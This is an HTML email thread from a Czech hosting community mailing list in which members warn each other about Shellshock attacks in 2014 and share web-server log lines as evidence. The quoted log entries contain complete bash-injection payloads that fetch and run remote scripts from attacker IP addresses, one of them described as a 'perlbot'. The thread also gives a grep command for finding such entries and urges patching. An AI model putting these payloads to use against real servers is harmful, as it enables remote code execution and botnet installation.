<div dir="ltr">Ahoj,<div><br></div><div>tak ja mam v apache logu toto:</div><div><br></div><div><div>/var/log/httpd/access_log:173.45.100.18 - - [28/Sep/2014:23:42:22 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 295 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget <a href="http://213.5.67.223/ji;curl"><font color="red"><b>MailScanner warning: numerical links are often malicious:</b></font> http://213.5.67.223/ji;curl</a> -O /tmp/ji <a href="http://213.5.67.223/jurat"><font color="red"><b>MailScanner warning: numerical links are often malicious:</b></font> http://213.5.67.223/jurat</a> ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""</div></div><div><br></div><div>Skript, na ktery to odkazuje se da stahnout a rika si "perlbot"...</div><div><br></div><div>Vojta</div><div><br></div><div><br></div><div><br></div></div><div class="gmail_extra"><br><div class="gmail_quote">Dne 29. září 2014 9:57 Jiří Medvěd <span dir="ltr"><<a href="mailto:admin@jirimedved.cz" target="_blank">admin@jirimedved.cz</a>></span> napsal(a):<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><span class="">-----BEGIN PGP SIGNED MESSAGE-----<br>
Hash: SHA256<br>
<br>
</span>Hele,<br>
<br>
z jineho stroje:<br>
<br>
/var/log/nginx/access.log-20140929.gz:70.42.149.67 - -<br>
[28/Sep/2014:08:16:18 +0200] "GET / HTTP/1.0" 444 0 "-" "() { :;};<br>
/bin/bash -c \x22wget -O /var/tmp/ec.z <a href="http://74.201.85.69/ec.z;chmod" target="_blank"><font color="red"><b>MailScanner warning: numerical links are often malicious:</b></font> 74.201.85.69/ec.z;chmod</a> +x<br>
/var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\x22"<br>
<span class=""><br>
Dne 29.9.2014 v 09:41 Petr Krcmar napsal(a):<br>
</span><span class="">> Ahoj, jen bych chtěl varovat, že útoky na bash jsou v plném<br>
> proudu, podle logu se mi včera někdo snažil do serveru nahrát<br>
> rootkit a pustit ho. Takže buďte ostražití a záplatujte si to.<br>
><br>
> Pokud chcete vidět ty věci z logu, pak si grepněte:<br>
><br>
> # grep '() {' /var/log/nginx/*<br>
><br>
> Pokud máte logrotate a zagzipované logy, tak použijte zgrep.<br>
><br>
</span><span class="">-----BEGIN PGP SIGNATURE-----<br>
Version: GnuPG v1<br>
<br>
</span>iF4EAREIAAYFAlQpENIACgkQ5JdzTS3AJTa8fAEAh8VbArIz7ElgezKEI44Yz5E9<br>
fSIKhd/2Z6T0ZSm3o+EA/0vaA7spDhwHRjGcOUtx81p+ScBcWvnM++8q3Iad3wPH<br>
=W15o<br>
-----END PGP SIGNATURE-----<br>
<div class="HOEnZb"><div class="h5">_______________________________________________<br>
Community-list mailing list<br>
<a href="mailto:Community-list@lists.vpsfree.cz">Community-list@lists.vpsfree.cz</a><br>
<a href="http://lists.vpsfree.cz/listinfo/community-list" target="_blank">http://lists.vpsfree.cz/listinfo/community-list</a><br>
</div></div></blockquote></div><br></div>